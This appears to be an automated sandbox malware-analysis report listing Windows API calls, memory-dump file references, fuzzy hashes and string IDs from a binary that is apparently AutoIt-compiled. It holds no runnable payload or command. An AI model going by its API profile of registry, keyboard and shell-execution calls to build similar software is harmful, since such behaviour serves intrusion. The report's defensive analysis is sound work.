• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: c9dbf453650a4fe8a80b41523e7bb72a14edd84d49b860b12bd30c98c5ea2bf0
• Instruction ID: 3235c9c30c22cf38890617eb8e1f25bea93d92b14a8b49ab676c09f0b219ac6c
• Opcode Fuzzy Hash: c9dbf453650a4fe8a80b41523e7bb72a14edd84d49b860b12bd30c98c5ea2bf0
• Instruction Fuzzy Hash: 96011DF2904208BFEB11A7E4AD89EFA776CDB08305F004495F746E6051EA749EC48B75
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                                • Part of subcall function 001D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001D2AE7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3479070676-0
                                                                                                                              APIs
                                                                                                                              • select.WS2_32 ref: 001C9B38
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C9B45
                                                                                                                              • __WSAFDIsSet.WS2_32(00000000,?), ref: 001C9B6F
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C9B9F
                                                                                                                              • htons.WS2_32(?), ref: 001C9C51
                                                                                                                              • inet_ntoa.WS2_32(?), ref: 001C9C0C
                                                                                                                                • Part of subcall function 001AE0F5: _strlen.LIBCMT ref: 001AE0FF
                                                                                                                                • Part of subcall function 001AE0F5: _memmove.LIBCMT ref: 001AE121
                                                                                                                              • _strlen.LIBCMT ref: 001C9CA7
                                                                                                                              • _memmove.LIBCMT ref: 001C9D10
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3637404534-0
                                                                                                                              APIs
                                                                                                                              • __mtinitlocknum.LIBCMT ref: 0019B744
                                                                                                                                • Part of subcall function 00198A0C: __FF_MSGBANNER.LIBCMT ref: 00198A21
                                                                                                                                • Part of subcall function 00198A0C: __NMSG_WRITE.LIBCMT ref: 00198A28
                                                                                                                                • Part of subcall function 00198A0C: __malloc_crt.LIBCMT ref: 00198A48
                                                                                                                              • __lock.LIBCMT ref: 0019B757
                                                                                                                              • __lock.LIBCMT ref: 0019B7A3
                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00226948,00000018,001A6C2B,?,00000000,00000109), ref: 0019B7BF
                                                                                                                              • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0019B7DC
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0019B7EC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1422805418-0
                                                                                                                              APIs
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 001BA1CE
                                                                                                                                • Part of subcall function 0019010A: std::exception::exception.LIBCMT ref: 0019013E
                                                                                                                                • Part of subcall function 0019010A: __CxxThrowException@8.LIBCMT ref: 00190153
                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001BA205
                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 001BA221
                                                                                                                              • _memmove.LIBCMT ref: 001BA26F
                                                                                                                              • _memmove.LIBCMT ref: 001BA28C
                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 001BA29B
                                                                                                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001BA2B0
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 001BA2CF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 256516436-0
                                                                                                                              APIs
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001D8CF3
                                                                                                                              • GetDC.USER32(00000000), ref: 001D8CFB
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001D8D06
                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 001D8D12
                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 001D8D4E
                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001D8D5F
                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001D8D99
                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001D8DB9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3864802216-0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                                • Part of subcall function 00173BCF: _wcscpy.LIBCMT ref: 00173BF2
                                                                                                                              • _wcstok.LIBCMT ref: 001C1D6E
                                                                                                                              • _wcscpy.LIBCMT ref: 001C1DFD
                                                                                                                              • _memset.LIBCMT ref: 001C1E30
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                              • String ID: X$t:"p:"
                                                                                                                              • API String ID: 774024439-221402397
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001D214B
                                                                                                                              • _memset.LIBCMT ref: 001D2214
                                                                                                                              • ShellExecuteExW.SHELL32(?), ref: 001D2259
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                                • Part of subcall function 00173BCF: _wcscpy.LIBCMT ref: 00173BF2
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001D2320
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 001D232F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 4082843840-2766056989
                                                                                                                              • Opcode ID: c2e57d194817723238bc68bce2b5326ad0332b6a4277b1ebdb713d86e1097e85
                                                                                                                              • Instruction ID: 09ea355a8b2ee3b466fa1ae739014cb692a4a6e808b5a318b037b9ff6d81a767
                                                                                                                              • Opcode Fuzzy Hash: c2e57d194817723238bc68bce2b5326ad0332b6a4277b1ebdb713d86e1097e85
                                                                                                                              • Instruction Fuzzy Hash: E1718F71A00619EFCF05EFA4D9959AEB7F5FF58310F10805AE85AAB351DB34AE40CB90
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32(?), ref: 001B481D
                                                                                                                              • GetKeyboardState.USER32(?), ref: 001B4832
                                                                                                                              • SetKeyboardState.USER32(?), ref: 001B4893
                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 001B48C1
                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 001B48E0
                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 001B4926
                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001B4949
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 87235514-0
                                                                                                                              • Opcode ID: 169d59be80f59e8223c5c9081844de65383fd689c78744557f10493a874824f5
                                                                                                                              • Instruction ID: 39858014ba796a488ef57a5751f607314bde901d1e2135c1ab3998f75d21af93
                                                                                                                              • Opcode Fuzzy Hash: 169d59be80f59e8223c5c9081844de65383fd689c78744557f10493a874824f5
                                                                                                                              • Instruction Fuzzy Hash: F251A0A0A087D53EFB3646648C45BFBBFA95B0A308F08C589E1D5568C3C7D8EC88D751
                                                                                                                              APIs
                                                                                                                              • GetParent.USER32(00000000), ref: 001B4638
                                                                                                                              • GetKeyboardState.USER32(?), ref: 001B464D
                                                                                                                              • SetKeyboardState.USER32(?), ref: 001B46AE
                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001B46DA
                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001B46F7
                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001B473B
                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001B475C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 87235514-0
                                                                                                                              • Opcode ID: 52c3f57e71f7cca84ce000b594bad1841f017f05dadae7ebca1a74594b30b99b
                                                                                                                              • Instruction ID: dbbb1e1276a60a8b71268dd9b3487514531c52640e9e62c3e479eb8bd82c490f
                                                                                                                              • Opcode Fuzzy Hash: 52c3f57e71f7cca84ce000b594bad1841f017f05dadae7ebca1a74594b30b99b
                                                                                                                              • Instruction Fuzzy Hash: 7151B1A05047D63FFB3687248C55BFABFA96B06304F08C489E1D58A8C3D794EC98D761
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2945705084-0
                                                                                                                              • Opcode ID: 092ca5479c9032b19deae160cb6b3d887da84f1942182c390957e5f8e5300447
                                                                                                                              • Instruction ID: 63b009881696a333c679ffce5f191abff56afc2c8f0051319eecfc711cf065ec
                                                                                                                              • Opcode Fuzzy Hash: 092ca5479c9032b19deae160cb6b3d887da84f1942182c390957e5f8e5300447
                                                                                                                              • Instruction Fuzzy Hash: 54411C65C1021476CF11EBB4C886ADEB7BCAF15710F608866E958F3222EB30E655C7E5
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001D9DB0
                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001D9E57
                                                                                                                              • IsMenu.USER32(?), ref: 001D9E6F
                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001D9EB7
                                                                                                                              • DrawMenuBar.USER32 ref: 001D9ED0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 3866635326-4108050209
                                                                                                                              • Opcode ID: 786656079bd30beb76fe0a67a1f197b5519c1446718ae596e801a946c793f845
                                                                                                                              • Instruction ID: 817dc048ece033e20ec0aa2da06c849b46861baa8986f3b25c6d8cffb300c694
                                                                                                                              • Opcode Fuzzy Hash: 786656079bd30beb76fe0a67a1f197b5519c1446718ae596e801a946c793f845
                                                                                                                              • Instruction Fuzzy Hash: D8411775A00209EFDB20DF59E884EAABBF5FF09354F04812AE9559B350D730ED54CB60
                                                                                                                              APIs
                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 001D3C92
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001D3CBC
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 001D3D71
                                                                                                                                • Part of subcall function 001D3C63: RegCloseKey.ADVAPI32(?), ref: 001D3CD9
                                                                                                                                • Part of subcall function 001D3C63: FreeLibrary.KERNEL32(?), ref: 001D3D2B
                                                                                                                                • Part of subcall function 001D3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 001D3D4E
                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 001D3D16
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 395352322-0
                                                                                                                              • Opcode ID: d1617c5e04354902365a3892f8b864bbf6d8ece022672abdd02eed1eb313c270
                                                                                                                              • Instruction ID: fc7fed30d8c4b7623e4a49858f5d784c7f21e7e9f608efedbde5b627e29762bb
                                                                                                                              • Opcode Fuzzy Hash: d1617c5e04354902365a3892f8b864bbf6d8ece022672abdd02eed1eb313c270
                                                                                                                              • Instruction Fuzzy Hash: 463109B1911209BFDB159BD4DC89AFEB7BDEF08300F50056AE522E2250DB709F89DB61
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001D8DF4
• GetWindowLongW.USER32(013EA668,000000F0), ref: 001D8E27
• GetWindowLongW.USER32(013EA668,000000F0), ref: 001D8E5C
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001D8E8E
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001D8EB8
• GetWindowLongW.USER32(?,000000F0), ref: 001D8EC9
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 001D8EE3
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B1734
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B175A
• SysAllocString.OLEAUT32(00000000), ref: 001B175D
• SysAllocString.OLEAUT32(?), ref: 001B177B
• SysFreeString.OLEAUT32(?), ref: 001B1784
• StringFromGUID2.COMBASE(?,?,00000028), ref: 001B17A9
• SysAllocString.OLEAUT32(?), ref: 001B17B7
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
  • Part of subcall function 001731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 001731DA
• lstrcmpiW.KERNEL32(?,?), ref: 001B6A2B
• _wcscmp.LIBCMT ref: 001B6A49
• MoveFileW.KERNEL32(?,?), ref: 001B6A62
  • Part of subcall function 001B6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 001B6DBA
  • Part of subcall function 001B6D6D: GetLastError.KERNEL32 ref: 001B6DC5
  • Part of subcall function 001B6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 001B6DD9
• _wcscat.LIBCMT ref: 001B6AA4
• SHFileOperationW.SHELL32(?), ref: 001B6B0C
Strings
Similarity
• API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 2323102230-1173974218
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B180D
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001B1833
• SysAllocString.OLEAUT32(00000000), ref: 001B1836
• SysAllocString.OLEAUT32 ref: 001B1857
• SysFreeString.OLEAUT32 ref: 001B1860
• StringFromGUID2.COMBASE(?,?,00000028), ref: 001B187A
• SysAllocString.OLEAUT32(?), ref: 001B1888
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
  • Part of subcall function 0018C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0018C657
  • Part of subcall function 0018C619: GetStockObject.GDI32(00000011), ref: 0018C66B
  • Part of subcall function 0018C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018C675
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001DA13B
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001DA148
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001DA153
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001DA162
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001DA16E
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
• __getptd_noexit.LIBCMT ref: 00194C3E
  • Part of subcall function 001986B5: GetLastError.KERNEL32(?,00190127,001988A3,00194673,?,?,00190127,?,0017125D,00000058,?,?), ref: 001986B7
  • Part of subcall function 001986B5: __calloc_crt.LIBCMT ref: 001986D8
  • Part of subcall function 001986B5: GetCurrentThreadId.KERNEL32 ref: 00198701
  • Part of subcall function 001986B5: SetLastError.KERNEL32(00000000,00190127,001988A3,00194673,?,?,00190127,?,0017125D,00000058,?,?), ref: 00198719
• CloseHandle.KERNEL32(?,?,00194C1D), ref: 00194C52
• __freeptd.LIBCMT ref: 00194C59
• RtlExitUserThread.NTDLL(00000000,?,00194C1D), ref: 00194C61
• GetLastError.KERNEL32(?,?,00194C1D), ref: 00194C91
• RtlExitUserThread.NTDLL(00000000,?,?,00194C1D), ref: 00194C98
• __freefls@4.LIBCMT ref: 00194CB4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1445074172-0
                                                                                                                              • Opcode ID: 5bc90397e43aa2dacbf9e6e11ee352ab675891efe261ed771759bd94d0caf96e
